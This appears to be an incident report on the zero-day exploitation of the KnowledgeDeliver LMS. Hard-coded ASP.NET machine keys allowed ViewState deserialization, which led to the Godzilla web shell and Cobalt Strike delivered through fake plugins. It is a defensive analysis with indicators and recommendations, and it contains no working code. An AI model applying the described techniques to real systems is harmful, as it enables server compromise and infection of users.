Full Report
A now-patched high-severity security flaw affecting Digital Knowledge KnowledgeDeliver, a Learning Management System (LMS) popular in Japan, was exploited as a zero-day to deliver the Godzilla web shell and ultimately facilitate the deployment of Cobalt Strike Beacon. The vulnerability, tracked as CVE-2026-5426 (CVSS score: 7.5), stems from the use of hard-coded ASP.NET machine keys, leading to
Analysis Summary
# Incident Report: Exploitation of KnowledgeDeliver LMS via CVE-2026-5426
## Executive Summary
A high-severity zero-day vulnerability in the Digital Knowledge KnowledgeDeliver LMS was exploited to achieve unauthenticated remote code execution (RCE). Attackers utilized hard-coded ASP.NET machine keys to deploy the Godzilla web shell and subsequently distribute Cobalt Strike Beacon through social engineering. The campaign focused on infecting end-users of the platform via tampered JavaScript and fake security updates.
## Incident Details
- **Discovery Date:** Approximately May 2026 (Publicly reported May 26, 2026)
- **Incident Date:** Active exploitation occurred prior to the February 24, 2026, patch.
- **Affected Organization:** Users of Digital Knowledge KnowledgeDeliver LMS
- **Sector:** Education / Learning Management
- **Geography:** Japan (Primary market for the software)
## Timeline of Events
### Initial Access
- **Date/Time:** Pre-February 2026 (Zero-day period)
- **Vector:** ViewState Deserialization (CVE-2026-5426)
- **Details:** Attackers exploited hard-coded `machineKey` values in the application's `web.config` file. By using these known keys, they crafted malicious ViewState payloads to achieve unauthenticated RCE.
### Lateral Movement
- **Details:** After gaining initial access, the threat actor executed commands to modify file system permissions, granting "Everyone" full access to the web application directory to facilitate further movement and persistence.
### Data Exfiltration/Impact
- **Details:** The primary impact was the compromise of the platform's integrity. Attackers injected malicious scripts into legitimate JavaScript files to deliver Cobalt Strike Beacon to unsuspecting users via a "fake plugin" prompt.
### Detection & Response
- **How it was discovered:** Identified by Google Mandiant and Google Threat Intelligence Group (GTIG).
- **Response actions taken:** Digital Knowledge released a patch for KnowledgeDeliver on February 24, 2026, to address the hard-coded keys.
## Attack Methodology
- **Initial Access:** Exploitation of CVE-2026-5426 (ViewState Deserialization).
- **Persistence:** Implementation of the Godzilla (BLUEBEAM) web shell.
- **Privilege Escalation:** Modifying ACLs/permissions on the web server directory.
- **Defense Evasion:** Use of encrypted Cobalt Strike payloads tailored with the victim organization's name to bypass generic detection.
- **Credential Access:** Not explicitly detailed, though web shells typically allow for harvesting.
- **Discovery:** Publicly disclosed ASP.NET machine keys were used to find vulnerable targets.
- **Lateral Movement:** Shifting from server compromise to client-side infection (Watering Hole attack).
- **Collection:** Targeting user machines via fake "security authentication plugin" installers.
- **Exfiltration:** Not specified, but Cobalt Strike was used for command-and-control (C2).
- **Impact:** Unauthorized code injection and deployment of malware to end-users.
## Impact Assessment
- **Financial:** Costs associated with incident response and potential legal liabilities regarding user infection.
- **Data Breach:** Exposure of server-side configurations and potential theft of user session data.
- **Operational:** Disruption of learning services and the need for urgent infrastructure patching and malware removal.
- **Reputational:** Significant impact due to the platform being used as a vector to infect its own customers.
## Indicators of Compromise
- **Network indicators:**
- Traffic to attacker-controlled domains hosting malicious scripts (e.g., `[attacker_domain].com`)
- Cobalt Strike C2 traffic (defanged)
- **File indicators:**
- Godzilla (BLUEBEAM) web shell files.
- Tampered application JavaScript files.
- Fake "security authentication plugin" installers.
- **Behavioral indicators:**
- Unexpected modifications to web application folder permissions (e.g., "Everyone: Full Control").
- Web server processes (w3wp.exe) spawning suspicious command-line shells.
## Response Actions
- **Containment measures:** Isolation of infected web servers.
- **Eradication steps:** Removal of the Godzilla web shell and restoration of tampered JavaScript files from clean backups.
- **Recovery actions:** Updating KnowledgeDeliver to the patched version (post-Feb 24, 2026) to generate unique machine keys.
## Lessons Learned
- **Shared Secrets:** Using standardized, hard-coded secrets (`machineKey`) in deployment templates creates a single point of failure for an entire ecosystem.
- **Supply Chain Risk:** Popular regional software can be a high-value target for zero-day exploitation.
- **Endpoint Monitoring:** Monitoring for unexpected permission changes in web directories can lead to earlier detection of web shell activity.
## Recommendations
- **Rotate Secrets:** Immediately ensure all ASP.NET applications use unique, non-default `machineKey` values.
- **Immutable Infrastructure:** Implement File Integrity Monitoring (FIM) to detect unauthorized changes to JS files or web configurations.
- **Patch Management:** Prioritize patching systems that utilize ViewState or similar deserialization mechanisms.
- **User Education:** Advise users to only download plugins from official, verified sources and to be wary of sudden "security alerts" within the LMS.